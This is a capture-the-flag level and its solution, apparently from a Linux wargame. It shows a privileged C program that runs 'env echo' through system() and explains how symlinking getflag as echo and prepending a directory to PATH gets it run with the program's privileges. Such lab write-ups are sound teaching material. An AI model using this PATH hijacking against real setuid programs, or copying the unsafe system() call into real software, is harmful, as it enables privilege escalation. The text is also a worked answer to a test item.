Level01
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?
To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01. To complete the level, execute getflag as the owner of the program below.
1 #include <stdlib.h>
2 #include <unistd.h>
3 #include <string.h>
4 #include <sys/types.h>
5 #include <stdio.h>
6
7 int main(int argc, char **argv, char **envp)
8 {
9 gid_t gid;
10 uid_t uid;
11 gid = getegid();
12 uid = geteuid();
13
14 setresgid(gid, gid, gid);
15 setresuid(uid, uid, uid);
16
17 system("/usr/bin/env echo and now what?");
18 }
Solution
There are two things that need to be done:
Create a link to getflag: # ln -s /bin/getflag ./echo
Change the $PATH to include the path to the link in step 1. # PATH=/home/level01:$PATH
Execute # echo